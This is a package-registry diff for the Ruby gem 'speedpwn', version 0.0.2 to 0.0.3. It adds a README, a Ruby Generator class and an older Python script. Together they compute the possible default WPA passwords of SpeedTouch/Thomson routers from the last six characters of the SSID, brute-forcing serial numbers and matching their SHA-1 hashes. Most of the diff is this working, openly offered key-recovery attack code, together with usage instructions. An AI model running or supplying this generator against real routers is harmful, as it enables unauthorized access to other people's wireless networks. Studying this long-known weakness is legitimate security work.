speedpwn 0.0.2 → 0.0.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- data/.gitignore +5 -0
- data/Gemfile +3 -0
- data/LICENSE +19 -0
- data/MANIFEST +14 -0
- data/README.md +49 -0
- data/Rakefile +7 -0
- data/lib/speedpwn.rb +6 -0
- data/lib/speedpwn/generator.rb +117 -0
- data/lib/speedpwn/version.rb +3 -0
- data/nostalgia/speedpwn.py +107 -0
- data/speedpwn.gemspec +20 -0
- data/task/manifest.rake +8 -0
- data/task/tag.rake +6 -0
- metadata +14 -1
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA1:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 3e572c6d9ed7860eba6ac8028c72f231df72829c
|
4
|
+
data.tar.gz: 4c6b960438ca7aedab06e027aa5883db135140f0
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 14456e0861ce92817d6b8e5c504111e3c30c9a7a65cc2766ba1da057b5f72d1acca9c499cd3010b9e5de49a786dadc35940f1f92d9124449fcbb6cc871600dab
|
7
|
+
data.tar.gz: 27b628c6c09cc57c74dc56b03025100c40fefaf35c409017d1bd03a21407b32941eeb4f0db70f36bcfe7dc589d524fa30b420ebe8f85aa3cd99ea449c20f4822
|
data/Gemfile
ADDED
data/LICENSE
ADDED
@@ -0,0 +1,19 @@
|
|
1
|
+
Copyright (c) 2013, Yorick Peterse
|
2
|
+
|
3
|
+
Permission is hereby granted, free of charge, to any person obtaining a copy
|
4
|
+
of this software and associated documentation files (the "Software"), to deal
|
5
|
+
in the Software without restriction, including without limitation the rights
|
6
|
+
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
7
|
+
copies of the Software, and to permit persons to whom the Software is
|
8
|
+
furnished to do so, subject to the following conditions:
|
9
|
+
|
10
|
+
The above copyright notice and this permission notice shall be included in
|
11
|
+
all copies or substantial portions of the Software.
|
12
|
+
|
13
|
+
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
14
|
+
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
15
|
+
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
16
|
+
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
17
|
+
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
18
|
+
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
|
19
|
+
THE SOFTWARE.
|
data/MANIFEST
ADDED
data/README.md
ADDED
@@ -0,0 +1,49 @@
|
|
1
|
+
# SpeedPwn
|
2
|
+
|
3
|
+
SpeedPwn is a Ruby application that can generate a list of possible passwords
|
4
|
+
for SpeedTouch/Thomson routers. BT Home hubs are not supported because they're
|
5
|
+
not used here in The Netherlands.
|
6
|
+
|
7
|
+
Originally I wrote a Python script (which can be found in
|
8
|
+
`nostalgia/speedpwn.py`) some time back in early 2009 to do this and I've used
|
9
|
+
it over the years. After using it for almost 4 years I decided it was time I'd
|
10
|
+
rewrite it in a decent way.
|
11
|
+
|
12
|
+
The algorithm used itself is nothing new and has been around since 2008. More
|
13
|
+
information about this can be found on the following webpages:
|
14
|
+
|
15
|
+
* <http://www.gnucitizen.org/blog/default-key-algorithm-in-thomson-and-bt-home-hub-routers/>
|
16
|
+
* <http://www.mentalpitstop.com/touchspeedcalc/calculate_speedtouch_default_wep_wpa_wpa2_password_by_ssid.html>
|
17
|
+
|
18
|
+
In plain English the algorithm for the default passwords can be described as
|
19
|
+
"Very dumb".
|
20
|
+
|
21
|
+
## Requirements
|
22
|
+
|
23
|
+
* Ruby 1.9.3 or newer
|
24
|
+
* OpenSSL
|
25
|
+
|
26
|
+
## Installation
|
27
|
+
|
28
|
+
Install it from RubyGems:
|
29
|
+
|
30
|
+
gem install speedpwn
|
31
|
+
|
32
|
+
Unlike other projects this one is not signed in any way. I consider it more of
|
33
|
+
a quick hobby/joke project and thus don't really want to bother with signing,
|
34
|
+
checksums, etc. Install at your own risk.
|
35
|
+
|
36
|
+
## Usage
|
37
|
+
|
38
|
+
Once installed, run it and pass the last 6 characters of the SSID:
|
39
|
+
|
40
|
+
speedpwn C28B9B
|
41
|
+
|
42
|
+
Generating the list of passwords can take a few minutes so go make some
|
43
|
+
tea/coffee while you wait for it to complete.
|
44
|
+
|
45
|
+
## License
|
46
|
+
|
47
|
+
All source code in this repository is licensed under the MIT license unless
|
48
|
+
specified otherwise. A copy of this license can be found in the file "LICENSE"
|
49
|
+
in the root directory of this repository.
|
data/Rakefile
ADDED
data/lib/speedpwn.rb
ADDED
@@ -0,0 +1,117 @@
|
|
1
|
+
module SpeedPwn
|
2
|
+
##
|
3
|
+
# The Generator class takes a SpeedTouch SSID part (the last 6 characters)
|
4
|
+
# and returns an Array containing the possible default passwords for it. This
|
5
|
+
# code is based on the following resources:
|
6
|
+
#
|
7
|
+
# * http://www.gnucitizen.org/blog/default-key-algorithm-in-thomson-and-bt-home-hub-routers/
|
8
|
+
# * http://www.mentalpitstop.com/touchspeedcalc/calculate_speedtouch_default_wep_wpa_wpa2_password_by_ssid.html
|
9
|
+
#
|
10
|
+
# Note that unlike other tools this particular one *only* supports SpeedTouch
|
11
|
+
# routers since BT Home hubs are not used in The Netherlands.
|
12
|
+
#
|
13
|
+
# @!attribute [r] identifier
|
14
|
+
# @return [String]
|
15
|
+
#
|
16
|
+
class Generator
|
17
|
+
attr_reader :identifier
|
18
|
+
|
19
|
+
##
|
20
|
+
# @return [Array]
|
21
|
+
#
|
22
|
+
YEARS = ('04'..(Time.now.strftime('%y'))).to_a
|
23
|
+
|
24
|
+
##
|
25
|
+
# @return [Array]
|
26
|
+
#
|
27
|
+
WEEKS = ('1'..'52').to_a
|
28
|
+
|
29
|
+
##
|
30
|
+
# @return [Array]
|
31
|
+
#
|
32
|
+
CHARACTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'.chars.to_a
|
33
|
+
|
34
|
+
##
|
35
|
+
# @param [String] identifier The last 6 characters of the SSID.
|
36
|
+
#
|
37
|
+
def initialize(identifier)
|
38
|
+
@identifier = identifier
|
39
|
+
@digest = OpenSSL::Digest::SHA1.new
|
40
|
+
end
|
41
|
+
|
42
|
+
##
|
43
|
+
# Sets the block to call whenever a week (= batch) has been processed.
|
44
|
+
#
|
45
|
+
# @param [Proc] block
|
46
|
+
#
|
47
|
+
def finish_batch(&block)
|
48
|
+
@finish_batch = block
|
49
|
+
end
|
50
|
+
|
51
|
+
##
|
52
|
+
# Generates the passwords and returns them as an Array of Strings.
|
53
|
+
#
|
54
|
+
# @return [Array]
|
55
|
+
#
|
56
|
+
def generate
|
57
|
+
passwords = []
|
58
|
+
batch_size = character_combinations.size
|
59
|
+
|
60
|
+
YEARS.each do |year|
|
61
|
+
WEEKS.each do |week|
|
62
|
+
character_combinations.each do |combo|
|
63
|
+
found = generate_password(year, week, combo)
|
64
|
+
|
65
|
+
passwords << found if found
|
66
|
+
end
|
67
|
+
|
68
|
+
@finish_batch.call(batch_size) if @finish_batch
|
69
|
+
end
|
70
|
+
end
|
71
|
+
|
72
|
+
return passwords
|
73
|
+
end
|
74
|
+
|
75
|
+
##
|
76
|
+
# Returns the amount of iterations to run.
|
77
|
+
#
|
78
|
+
# @return [Numeric]
|
79
|
+
#
|
80
|
+
def size
|
81
|
+
return YEARS.size * WEEKS.size * character_combinations.size
|
82
|
+
end
|
83
|
+
|
84
|
+
alias_method :count, :size
|
85
|
+
|
86
|
+
private
|
87
|
+
|
88
|
+
##
|
89
|
+
# @param [String] year
|
90
|
+
# @param [String] week
|
91
|
+
# @param [String] combo
|
92
|
+
# @return [String]
|
93
|
+
#
|
94
|
+
def generate_password(year, week, combo)
|
95
|
+
found = nil
|
96
|
+
serial = "CP#{year}#{week}#{combo}".upcase
|
97
|
+
hash = @digest.hexdigest(serial).upcase
|
98
|
+
|
99
|
+
if hash[-6..-1] == identifier
|
100
|
+
found = hash[0..9]
|
101
|
+
end
|
102
|
+
|
103
|
+
return found
|
104
|
+
end
|
105
|
+
|
106
|
+
##
|
107
|
+
# @return [Array]
|
108
|
+
#
|
109
|
+
def character_combinations
|
110
|
+
@combinations ||= CHARACTERS.permutation(3).map do |group|
|
111
|
+
group.map { |char| char.ord.to_s(16) }.join('')
|
112
|
+
end
|
113
|
+
|
114
|
+
return @combinations
|
115
|
+
end
|
116
|
+
end # Generator
|
117
|
+
end # SpeedPwn
|
@@ -0,0 +1,107 @@
|
|
1
|
+
#!/usr/bin/env python
|
2
|
+
##
|
3
|
+
# Author: Yorick Peterse
|
4
|
+
# Website: http://www.yorickpeterse.com/
|
5
|
+
# Description: SpeedTouch Key is a Python script that generates (possible) keys
|
6
|
+
# for a SpeedTouch Wireless network that uses the default SSID/password
|
7
|
+
# combination based on the serial number.
|
8
|
+
#
|
9
|
+
# Imports
|
10
|
+
from hashlib import sha1
|
11
|
+
from multiprocessing import Process
|
12
|
+
import sys
|
13
|
+
import os
|
14
|
+
import itertools
|
15
|
+
|
16
|
+
# =============================================
|
17
|
+
# ============= 1: Initialization =============
|
18
|
+
# =============================================
|
19
|
+
|
20
|
+
# Fancy boot screen
|
21
|
+
print "==================================\n==== SpeedTouch Key Generator ====\n==================================\n"
|
22
|
+
|
23
|
+
# SSID part
|
24
|
+
ssid_part = raw_input("Enter the last 6 characters of the SSID: ")
|
25
|
+
ssid_part = ssid_part.upper().strip()
|
26
|
+
|
27
|
+
# Validate the SSID part
|
28
|
+
if len(ssid_part) <> 6:
|
29
|
+
print "ERROR: The specified part of the SSID is invalid, it should be exactly 6 characters long"
|
30
|
+
sys.exit()
|
31
|
+
else:
|
32
|
+
pass
|
33
|
+
|
34
|
+
# Required variables in order to generate the serial number
|
35
|
+
production_years = ['04', '05','06','07','08','09','10', '11']
|
36
|
+
production_weeks = range(1,53)
|
37
|
+
|
38
|
+
# Required in order to generate the unit number
|
39
|
+
chars_string = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
|
40
|
+
list_items = []
|
41
|
+
unit_numbers = []
|
42
|
+
|
43
|
+
# Convert the string to a list
|
44
|
+
for char in chars_string:
|
45
|
+
list_items.append(char)
|
46
|
+
|
47
|
+
# Dict containing the final results
|
48
|
+
processed_years = []
|
49
|
+
password_dict = {}
|
50
|
+
|
51
|
+
# Get all possible combinations
|
52
|
+
combinations = itertools.permutations(list_items,3)
|
53
|
+
|
54
|
+
# =============================================
|
55
|
+
# ========= 2: Combination generation =========
|
56
|
+
# =============================================
|
57
|
+
|
58
|
+
# Loop through each combination, convert it to a string and add it to the list
|
59
|
+
for combination in combinations:
|
60
|
+
# Convert to string and to hex
|
61
|
+
to_append = '%s%s%s' % (combination[0],combination[1],combination[2])
|
62
|
+
to_append = to_append.encode('hex')
|
63
|
+
|
64
|
+
# Append to the list, but only if it isn't already in there
|
65
|
+
unit_numbers.append(to_append)
|
66
|
+
|
67
|
+
# =============================================
|
68
|
+
# ============ 3: Main application ============
|
69
|
+
# =============================================
|
70
|
+
|
71
|
+
# Generator function
|
72
|
+
def generator(year,weeks,units):
|
73
|
+
# Loop through each week
|
74
|
+
for week in weeks:
|
75
|
+
|
76
|
+
# Loop through each possible unit number
|
77
|
+
for unit in units:
|
78
|
+
# Create the serial number
|
79
|
+
serial = 'CP%s%s%s' % (year,week,unit)
|
80
|
+
serial = serial.upper()
|
81
|
+
|
82
|
+
# Hash the serial using SHA-1
|
83
|
+
serial_hash = sha1(serial).hexdigest().upper()
|
84
|
+
|
85
|
+
# Get the last bit and compare it to the input, print the key if it matches
|
86
|
+
last_bit = serial_hash[-6:]
|
87
|
+
password = serial_hash[:10]
|
88
|
+
|
89
|
+
if last_bit == ssid_part:
|
90
|
+
# Add the password to the dictionary
|
91
|
+
print
|
92
|
+
print " * Possible password: %s" % (password)
|
93
|
+
print " Year: %s" % (year)
|
94
|
+
print " Week: %s" % (week)
|
95
|
+
print " Combo: %s" % (unit)
|
96
|
+
print " Serial: %s" % (serial)
|
97
|
+
|
98
|
+
sys.exit()
|
99
|
+
|
100
|
+
# Main part, this is where most of the work is done
|
101
|
+
# Loop through each year and create a new process
|
102
|
+
if __name__ == '__main__':
|
103
|
+
print "Generating possible passwords..."
|
104
|
+
|
105
|
+
for year in production_years:
|
106
|
+
p = Process(target=generator, args=(year,production_weeks,unit_numbers))
|
107
|
+
p.start()
|
data/speedpwn.gemspec
ADDED
@@ -0,0 +1,20 @@
|
|
1
|
+
require File.expand_path('../lib/speedpwn/version', __FILE__)
|
2
|
+
|
3
|
+
Gem::Specification.new do |gem|
|
4
|
+
gem.name = 'speedpwn'
|
5
|
+
gem.version = SpeedPwn::VERSION
|
6
|
+
gem.author = 'Yorick Peterse'
|
7
|
+
gem.email = 'yorickpeterse@gmail.com'
|
8
|
+
gem.summary = 'Generates possible passwords for SpeedTouch/Thomson routers.'
|
9
|
+
gem.description = gem.summary
|
10
|
+
gem.executables = ['speedpwn']
|
11
|
+
gem.license = 'MIT'
|
12
|
+
gem.has_rdoc = 'yard'
|
13
|
+
|
14
|
+
gem.required_ruby_version = '>= 1.9.3'
|
15
|
+
|
16
|
+
gem.files = File.read(File.expand_path('../MANIFEST', __FILE__)).split("\n")
|
17
|
+
|
18
|
+
gem.add_dependency 'slop'
|
19
|
+
gem.add_dependency 'progress_bar'
|
20
|
+
end
|
data/task/manifest.rake
ADDED
data/task/tag.rake
ADDED
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: speedpwn
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.0.
|
4
|
+
version: 0.0.3
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- Yorick Peterse
|
@@ -45,7 +45,20 @@ executables:
|
|
45
45
|
extensions: []
|
46
46
|
extra_rdoc_files: []
|
47
47
|
files:
|
48
|
+
- .gitignore
|
49
|
+
- Gemfile
|
50
|
+
- LICENSE
|
51
|
+
- MANIFEST
|
52
|
+
- README.md
|
53
|
+
- Rakefile
|
48
54
|
- bin/speedpwn
|
55
|
+
- lib/speedpwn.rb
|
56
|
+
- lib/speedpwn/generator.rb
|
57
|
+
- lib/speedpwn/version.rb
|
58
|
+
- nostalgia/speedpwn.py
|
59
|
+
- speedpwn.gemspec
|
60
|
+
- task/manifest.rake
|
61
|
+
- task/tag.rake
|
49
62
|
homepage:
|
50
63
|
licenses:
|
51
64
|
- MIT
|